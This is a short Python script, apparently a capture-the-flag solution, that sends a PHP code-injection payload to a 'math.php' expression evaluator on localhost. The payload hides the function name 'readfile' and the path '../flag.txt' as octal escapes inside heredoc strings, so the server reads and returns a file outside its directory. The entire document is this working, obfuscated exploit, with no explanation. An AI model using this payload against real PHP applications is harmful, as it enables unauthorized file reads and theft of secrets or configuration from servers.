#! /usr/bin/env python3

import requests

s = requests.Session()

payload = """(<<<abs
    \\162\\145\\141\\144\\146\\151\\154\\145
    abs)(<<<abs
    \\56\\56\\57\\146\\154\\141\\147\\56\\164\\170\\164
    abs)"""

res = s.post(
    "http://localhost/math.php",
    data={"expression": payload},
    headers={"Content-Type": "application/x-www-form-urlencoded"},
)


print(res.text)
